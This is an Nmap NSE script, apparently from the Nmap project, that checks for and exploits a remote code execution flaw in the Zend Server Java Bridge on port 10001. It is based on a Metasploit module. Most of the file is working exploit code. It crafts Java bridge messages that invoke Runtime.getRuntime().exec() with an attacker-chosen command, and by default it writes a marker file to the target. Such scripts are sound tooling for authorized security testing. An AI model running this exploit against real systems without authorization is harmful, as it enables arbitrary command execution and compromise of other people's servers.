description = [[
Checks for and/or exploits a remote code execution vulnerability in the
Zend Java Bridge Component of the Zend Server (OSVDB 71420).

The logic of this script and the Java bytecode are based on the
metasploit java_bridge exploit written by MC.
http://www.metasploit.com/modules/auxiliary/admin/zend/java_bridge

References:
* http://osvdb.org/71420
* http://www.exploit-db.com/exploits/17078/
* http://www.metasploit.com/modules/auxiliary/admin/zend/java_bridge
]]

---
-- @usage
-- nmap --script zend-vuln-osvdb71420 -p 10001 <host>
-- 
-- @output
-- PORT      STATE SERVICE
-- 10001/tcp open  scp-config
--

-- Thanks to MC of metasploit for his help and suggestions.
author = "Djalal Harouni and MC"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit", "intrusive", "vuln"}

require "bin"
require "nmap"
require "stdnse"
require "shortport"

portrule = shortport.portnumber(10001, "tcp")

local DEFAULT_CMD = "cmd /c echo \"zend_java_vuln\" > %SYSTEMDRIVE%\\nmap.txt"

local function zend_finish(socket, status, message)
  if socket then
    socket:close()
  end
  return status, message
end

local function query(socket, data)
  local status, ret = socket:send(data)
  if status then
    status, ret = socket:receive()
  end
  return status, ret
end

local function check_zend_java_bridge(zend_opts)
  local out, osvdb = {}, "OSVDB: 71420"
  local zend_str = "Zend Server Java Bridge Remote Code Execution"

  local socket = nmap.new_socket()
  socket:set_timeout(10000)

  local status, ret = socket:connect(zend_opts.host, zend_opts.port, "tcp")
  if not status then
    return zend_finish(socket, status,
              string.format("connection error: %s", ret))
  end

  -- Jave bytecode generating is based on the metasploit module
  -- zend_bridge by MC.
  local java_obj = bin.pack("<III", 0x33000000, 0x00000000, 0x0c000000)
  java_obj = java_obj .. "CreateObject"
  java_obj = java_obj .. bin.pack("<IIC", 0x02000000, 0x00000004, 0x11)
  java_obj = java_obj .. "java.lang.Runtime" ..
             bin.pack("<CI", 0x07, 0x00000000)

  status, ret = query(socket, java_obj)
  if not status then
    return zend_finish(socket, status,
              "java: failed to query Java object")
  end

  local _, classid = bin.unpack(">A4", ret, 6)
  if not classid then
    return zend_finish(socket, false,
              "java: failed to retrieve the class id")
  end

  local runtime = bin.pack("<I", 0x16000000) .. classid
  runtime = runtime .. bin.pack("<I", 0x0a000000) ..
            "getRuntime" .. bin.pack("<I", 0x00000000)

  status, ret = query(socket, runtime)
  if not status then
    return zend_finish(socket, status,
              "java: failed to query Java 'getRuntime()'")
  end

  local _, methode = bin.unpack(">A4", ret, 6)
  if not methode then
    return zend_finish(socket, false,
              "java: failed to retrieve the methode id")
  end

  local exec = bin.pack(">SS", 0x00, 21 + string.len(zend_opts.cmd)) ..
               methode .. bin.pack("<I", 0x04000000) .. "exec"
  exec = exec .. bin.pack("<IC", 0x01000000, 0x04) ..
         bin.pack(">SS", 0x00, string.len(zend_opts.cmd)) .. zend_opts.cmd

  status, ret = query(socket, exec)
  if not status then
    return zend_finish(socket, status,
              "java: failed to query Java 'exec()'")
  end

  local _, id, result = bin.unpack(">A2C", ret)
  if not result then
     return zend_finish(socket, false,
                "java: failed to check 'exec()' results")
  elseif string.match(id, "%z+") then
    if result == 0 then
      -- cmd executed successfully
    end
  end  

  return zend_finish(socket, true, out)
end

action = function(host, port)
  local zend_opts = {
    host = host,
    port = port,
    cmd = stdnse.get_script_args("zend-vuln-osvdb71420.cmd") or
              stdnse.get_script_args("exploit.cmd") or
              DEFAULT_CMD,
  }

  local status, output = check_zend_java_bridge(zend_opts)
  if not status then
    stdnse.print_debug(1, "%s: %s", SCRIPT_NAME, output)
    return nil
  end
  return stdnse.format_output(status, output)
end